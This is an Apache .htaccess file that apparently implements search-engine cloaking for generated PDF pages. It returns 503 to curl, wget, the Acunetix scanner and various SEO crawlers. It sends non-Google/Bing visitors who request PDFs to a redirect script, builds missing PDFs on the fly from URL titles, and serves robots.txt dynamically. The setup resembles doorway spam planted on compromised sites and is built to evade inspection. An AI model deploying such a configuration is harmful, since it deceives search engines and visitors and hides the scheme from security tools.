<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (seznambot|alertmix|ahrefs|linkdex|woobot|internetVista|openlinkprofiler|spbot|baidu|wget|curl|acunetix|fhscan|yandex|archive.org_bot|Baiduspider|MJ12bot|spbot) [NC]
RewriteRule .* - [R=503,L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} \.pdf$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(google|googlebot|Googlebot-Image|Googlebot-News|Googlebot-Video|Googlebot-Mobile|Mediapartners|Mediapartners-Google|AdsBot-Google|Bingbot|msnbot|baiduspider|slurp) [NC]
RewriteRule ^([a-zA-Z0-9]+)/(.*)\.pdf$ pdf-redirect.php?dir=$1&path=$2 [L]
</IfModule>

<Files ~ "\.pdf$">
  Header set X-Robots-Tag "NOARCHIVE, NOTRANSLATE"
</Files>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} \.pdf$ [NC]
RewriteCond %{HTTP:if-modified-since} . [NC]
RewriteRule . /not_modified.php [L]
</IfModule>

RewriteRule ^robots.txt$ robots.php

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
#RewriteCond %{REQUEST_URI} \.pdf$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^Storage/([a-zA-Z0-9-_]+)\.pdf$ pdf-creator.php?title=$1 [L]
</IfModule>